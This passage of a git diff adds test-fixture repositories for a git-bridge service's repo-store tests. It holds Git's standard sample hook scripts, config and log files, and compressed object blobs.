match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. +# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. By default this is allowed. +# + +# --- Command line +refname="$1" +oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." >&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) + echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/index new file mode 100644 index 0000000..9756dde Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/HEAD new file mode 100644 index 0000000..2c05a99 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/HEAD @@ -0,0 +1 @@ +0000000000000000000000000000000000000000 6c12c073e5702530a9d06b83840d62f8a6621764 Winston Li <git@winston.li> 1471957694 +0100 commit (initial): Main diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..2c05a99 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/logs/refs/heads/master @@ -0,0 +1 @@ +0000000000000000000000000000000000000000 6c12c073e5702530a9d06b83840d62f8a6621764 Winston Li <git@winston.li> 1471957694 +0100 commit (initial): Main diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/6c/12c073e5702530a9d06b83840d62f8a6621764 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/6c/12c073e5702530a9d06b83840d62f8a6621764 new file mode 100644 index 0000000..00a6b21 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/6c/12c073e5702530a9d06b83840d62f8a6621764 @@ -0,0 +1,2 @@ +x= +1@abzAfH&! ::&x}AO`W溊qngrEϘr.km&FJ٤WOǛ!' (r єL۟\ _2 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/7f/37654ebf6d0a19650abbcf5db3953b15001d1b b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/7f/37654ebf6d0a19650abbcf5db3953b15001d1b new file mode 100644 index 0000000..f77bc41 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/7f/37654ebf6d0a19650abbcf5db3953b15001d1b differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/d8/5308af36ff394df8bf063719b2aea26077aaea b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/d8/5308af36ff394df8bf063719b2aea26077aaea new file mode 100644 index 0000000..433ce0d Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/objects/d8/5308af36ff394df8bf063719b2aea26077aaea differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/refs/heads/master new file mode 100644 index 0000000..4b8baba --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest/rootdir/proj2/DOTgit/refs/heads/master @@ -0,0 +1 @@ +6c12c073e5702530a9d06b83840d62f8a6621764 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/.gitignore b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/.gitignore new file mode 100644 index 0000000..f5b2fc4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/.gitignore @@ -0,0 +1,2 @@ ++*.ignored + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/COMMIT_EDITMSG b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/COMMIT_EDITMSG new file mode 100644 index 0000000..810e445 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/COMMIT_EDITMSG @@ -0,0 +1 @@ +Commit bad gitignore diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/HEAD new file mode 100644 index 0000000..cb089cd --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/HEAD @@ -0,0 +1 @@ +ref: refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/config b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/config new file mode 100644 index 0000000..6c9406b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/config @@ -0,0 +1,7 @@ +[core] + repositoryformatversion = 0 + filemode = true + bare = false + logallrefupdates = true + ignorecase = true + precomposeunicode = true diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/description b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/description new file mode 100644 index 0000000..498b267 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/description @@ -0,0 +1 @@ +Unnamed repository; edit this file 'description' to name the repository. diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/applypatch-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/applypatch-msg.sample new file mode 100755 index 0000000..a5d7b84 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/applypatch-msg.sample @@ -0,0 +1,15 @@ +#!/bin/sh +# +# An example hook script to check the commit log message taken by +# applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. The hook is +# allowed to edit the commit message file. +# +# To enable this hook, rename this file to "applypatch-msg". + +. git-sh-setup +commitmsg="$(git rev-parse --git-path hooks/commit-msg)" +test -x "$commitmsg" && exec "$commitmsg" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/commit-msg.sample new file mode 100755 index 0000000..b58d118 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/commit-msg.sample @@ -0,0 +1,24 @@ +#!/bin/sh +# +# An example hook script to check the commit log message. +# Called by "git commit" with one argument, the name of the file +# that has the commit message. The hook should exit with non-zero +# status after issuing an appropriate message if it wants to stop the +# commit. The hook is allowed to edit the commit message file. +# +# To enable this hook, rename this file to "commit-msg". + +# Uncomment the below to add a Signed-off-by line to the message. +# Doing this in a hook is a bad idea in general, but the prepare-commit-msg +# hook is more suited to it. +# +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" + +# This example catches duplicate Signed-off-by lines. + +test "" = "$(grep '^Signed-off-by: ' "$1" | + sort | uniq -c | sed -e '/^[ ]*1[ ]/d')" || { + echo >&2 Duplicate Signed-off-by lines. + exit 1 +} diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/post-update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/post-update.sample new file mode 100755 index 0000000..ec17ec1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/post-update.sample @@ -0,0 +1,8 @@ +#!/bin/sh +# +# An example hook script to prepare a packed repository for use over +# dumb transports. +# +# To enable this hook, rename this file to "post-update". + +exec git update-server-info diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-applypatch.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-applypatch.sample new file mode 100755 index 0000000..4142082 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-applypatch.sample @@ -0,0 +1,14 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed +# by applypatch from an e-mail message. +# +# The hook should exit with non-zero status after issuing an +# appropriate message if it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-applypatch". + +. git-sh-setup +precommit="$(git rev-parse --git-path hooks/pre-commit)" +test -x "$precommit" && exec "$precommit" ${1+"$@"} +: diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-commit.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-commit.sample new file mode 100755 index 0000000..68d62d5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-commit.sample @@ -0,0 +1,49 @@ +#!/bin/sh +# +# An example hook script to verify what is about to be committed. +# Called by "git commit" with no arguments. The hook should +# exit with non-zero status after issuing an appropriate message if +# it wants to stop the commit. +# +# To enable this hook, rename this file to "pre-commit". + +if git rev-parse --verify HEAD >/dev/null 2>&1 +then + against=HEAD +else + # Initial commit: diff against an empty tree object + against=4b825dc642cb6eb9a060e54bf8d69288fbee4904 +fi + +# If you want to allow non-ASCII filenames set this variable to true. +allownonascii=$(git config --bool hooks.allownonascii) + +# Redirect output to stderr. +exec 1>&2 + +# Cross platform projects tend to avoid non-ASCII filenames; prevent +# them from being added to the repository. We exploit the fact that the +# printable range starts at the space character and ends with tilde. +if [ "$allownonascii" != "true" ] && + # Note that the use of brackets around a tr range is ok here, (it's + # even required, for portability to Solaris 10's /usr/bin/tr), since + # the square bracket bytes happen to fall in the designated range. + test $(git diff --cached --name-only --diff-filter=A -z $against | + LC_ALL=C tr -d '[ -~]\0' | wc -c) != 0 +then + cat <<\EOF +Error: Attempt to add a non-ASCII file name. + +This can cause problems if you want to work with people on other platforms. + +To be portable it is advisable to rename the file. + +If you know what you are doing you can disable this check using: + + git config hooks.allownonascii true +EOF + exit 1 +fi + +# If there are whitespace errors, print the offending file names and fail. +exec git diff-index --check --cached $against -- diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-push.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-push.sample new file mode 100755 index 0000000..6187dbf --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-push.sample @@ -0,0 +1,53 @@ +#!/bin/sh + +# An example hook script to verify what is about to be pushed. Called by "git +# push" after it has checked the remote status, but before anything has been +# pushed. If this script exits with a non-zero status nothing will be pushed. +# +# This hook is called with the following parameters: +# +# $1 -- Name of the remote to which the push is being done +# $2 -- URL to which the push is being done +# +# If pushing without using a named remote those arguments will be equal. +# +# Information about the commits which are being pushed is supplied as lines to +# the standard input in the form: +# +# <local ref> <local sha1> <remote ref> <remote sha1> +# +# This sample shows how to prevent push of commits where the log message starts +# with "WIP" (work in progress). + +remote="$1" +url="$2" + +z40=0000000000000000000000000000000000000000 + +while read local_ref local_sha remote_ref remote_sha +do + if [ "$local_sha" = $z40 ] + then + # Handle delete + : + else + if [ "$remote_sha" = $z40 ] + then + # New branch, examine all commits + range="$local_sha" + else + # Update to existing branch, examine new commits + range="$remote_sha..$local_sha" + fi + + # Check for WIP commit + commit=`git rev-list -n 1 --grep '^WIP' "$range"` + if [ -n "$commit" ] + then + echo >&2 "Found WIP commit in $local_ref, not pushing" + exit 1 + fi + fi +done + +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-rebase.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-rebase.sample new file mode 100755 index 0000000..9773ed4 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/pre-rebase.sample @@ -0,0 +1,169 @@ +#!/bin/sh +# +# Copyright (c) 2006, 2008 Junio C Hamano +# +# The "pre-rebase" hook is run just before "git rebase" starts doing +# its job, and can prevent the command from running by exiting with +# non-zero status. +# +# The hook is called with the following parameters: +# +# $1 -- the upstream the series was forked from. +# $2 -- the branch being rebased (or empty when rebasing the current branch). +# +# This sample shows how to prevent topic branches that are already +# merged to 'next' branch from getting rebased, because allowing it +# would result in rebasing already published history. + +publish=next +basebranch="$1" +if test "$#" = 2 +then + topic="refs/heads/$2" +else + topic=`git symbolic-ref HEAD` || + exit 0 ;# we do not interrupt rebasing detached HEAD +fi + +case "$topic" in +refs/heads/??/*) + ;; +*) + exit 0 ;# we do not interrupt others. + ;; +esac + +# Now we are dealing with a topic branch being rebased +# on top of master. Is it OK to rebase it? + +# Does the topic really exist? +git show-ref -q "$topic" || { + echo >&2 "No such branch $topic" + exit 1 +} + +# Is topic fully merged to master? +not_in_master=`git rev-list --pretty=oneline ^master "$topic"` +if test -z "$not_in_master" +then + echo >&2 "$topic is fully merged to master; better remove it." + exit 1 ;# we could allow it, but there is no point. +fi + +# Is topic ever merged to next? If so you should not be rebasing it. +only_next_1=`git rev-list ^master "^$topic" ${publish} | sort` +only_next_2=`git rev-list ^master ${publish} | sort` +if test "$only_next_1" = "$only_next_2" +then + not_in_topic=`git rev-list "^$topic" master` + if test -z "$not_in_topic" + then + echo >&2 "$topic is already up-to-date with master" + exit 1 ;# we could allow it, but there is no point. + else + exit 0 + fi +else + not_in_next=`git rev-list --pretty=oneline ^${publish} "$topic"` + /usr/bin/perl -e ' + my $topic = $ARGV[0]; + my $msg = "* $topic has commits already merged to public branch:\n"; + my (%not_in_next) = map { + /^([0-9a-f]+) /; + ($1 => 1); + } split(/\n/, $ARGV[1]); + for my $elem (map { + /^([0-9a-f]+) (.*)$/; + [$1 => $2]; + } split(/\n/, $ARGV[2])) { + if (!exists $not_in_next{$elem->[0]}) { + if ($msg) { + print STDERR $msg; + undef $msg; + } + print STDERR " $elem->[1]\n"; + } + } + ' "$topic" "$not_in_next" "$not_in_master" + exit 1 +fi + +exit 0 + +################################################################ + +This sample hook safeguards topic branches that have been +published from being rewound. + +The workflow assumed here is: + + * Once a topic branch forks from "master", "master" is never + merged into it again (either directly or indirectly). + + * Once a topic branch is fully cooked and merged into "master", + it is deleted. If you need to build on top of it to correct + earlier mistakes, a new topic branch is created by forking at + the tip of the "master". This is not strictly necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". + +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. + +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/badgitignore/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. +# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. By default this is allowed. +# + +# --- Command line +refname="$1" +oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." >&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for 